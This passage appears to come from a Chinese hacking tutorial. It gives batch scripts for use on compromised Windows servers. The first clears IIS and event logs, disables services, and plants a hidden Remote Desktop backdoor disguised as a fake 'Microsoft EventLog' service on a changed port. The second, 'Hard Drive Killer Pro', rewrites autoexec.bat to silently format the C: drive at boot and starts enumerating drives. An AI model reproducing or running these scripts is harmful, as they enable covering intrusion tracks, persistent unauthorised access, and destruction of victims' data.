@echo Windows Registry Editor Version 5.00 >patch.dll @echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//lanmanserver//parameters] >>patch.dll @echo "AutoShareServer"=dword:00000000 >>patch.dll @echo "AutoShareWks"=dword:00000000 >>patch.dll @REM [禁止共享] @echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Control//Lsa] >>patch.dll @echo "restrictanonymous"=dword:00000001 >>patch.dll @REM [禁止匿名登录] @echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//NetBT//Parameters] >>patch.dll @echo "SMBDeviceEnabled"=dword:00000000 >>patch.dll @REM [禁止及文件访问和打印共享] @echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//@REMoteRegistry] >>patch.dll @echo "Start"=dword:00000004 >>patch.dll @echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//Schedule] >>patch.dll @echo "Start"=dword:00000004 >>patch.dll @echo [HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//Windows NT//CurrentVersion//Winlogon] >>patch.dll @echo "ShutdownWithoutLogon"="0" >>patch.dll @REM [禁止登录前关机] @echo "DontDisplayLastUserName"="1" >>patch.dll @REM [禁止显示前一个登录用户名称] @regedit /s patch.dll ------------------------ cut here then save as .bat or .cmd file --------------------------- 下面命令是清除肉鸡所有日志,禁止一些危险的服务,并修改肉鸡的terminnal service留跳后路。 @regedit /s patch.dll @net stop w3svc @net stop event log @del c://winnt//system32//logfiles//w3svc1//*.* /f /q @del c://winnt//system32//logfiles//w3svc2//*.* /f /q @del c://winnt//system32//config//*.event /f /q @del c://winnt//system32dtclog//*.* /f /q @del c://winnt//*.txt /f /q @del c://winnt//*.log /f /q @net start w3svc @net start event log @rem [删除日志] @net stop lanmanserver /y @net stop Schedule /y @net stop RemoteRegistry /y @del patch.dll @echo The server has been patched,Have fun. @del patch.bat @REM [禁止一些危险的服务。] @echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Control//Terminal Server//WinStations//RDP-Tcp] >>patch.dll @echo "PortNumber"=dword:00002010 >>patch.dll @echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Control//Terminal Server//Wds//rdpwd//Tds//tcp >>patch.dll @echo "PortNumber"=dword:00002012 >>patch.dll @echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//TermDD] >>patch.dll @echo "Start"=dword:00000002 >>patch.dll @echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//SecuService] >>patch.dll @echo "Start"=dword:00000002 >>patch.dll @echo "ErrorControl"=dword:00000001 >>patch.dll @echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,// >>patch.dll @echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,// >>patch.dll @echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 >>patch.dll @echo "ObjectName"="LocalSystem" >>patch.dll @echo "Type"=dword:00000010 >>patch.dll @echo "Description"="Keep record of the program and windows message。" >>patch.dll @echo "DisplayName"="Microsoft EventLog" >>patch.dll @echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//termservice] >>patch.dll @echo "Start"=dword:00000004 >>patch.dll @copy c://winnt//system32//termsrv.exe c://winnt//system32//eventlog.exe @REM [修改3389连接,端口为8210(十六进制为00002012),名称为Microsoft EventLog,留条后路] 3.Hard Drive Killer Pro Version 4.0(玩批处理到这个水平真的不容易了。) ------------------------ cut here then save as .bat or .cmd file --------------------------- @echo off rem This program is dedecated to a very special person that does not want to be named. :start cls echo PLEASE WAIT WHILE PROGRAM LOADS . . . call attrib -r -h c://autoexec.bat >nul echo @echo off >c://autoexec.bat echo call format c: /q /u /autoSample >nul >>c://autoexec.bat call attrib +r +h c://autoexec.bat >nul rem Drive checking and assigning the valid drives to the drive variable. set drive= set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z rem code insertion for Drive Checking takes place here. rem drivechk.bat is the file name under the root directory.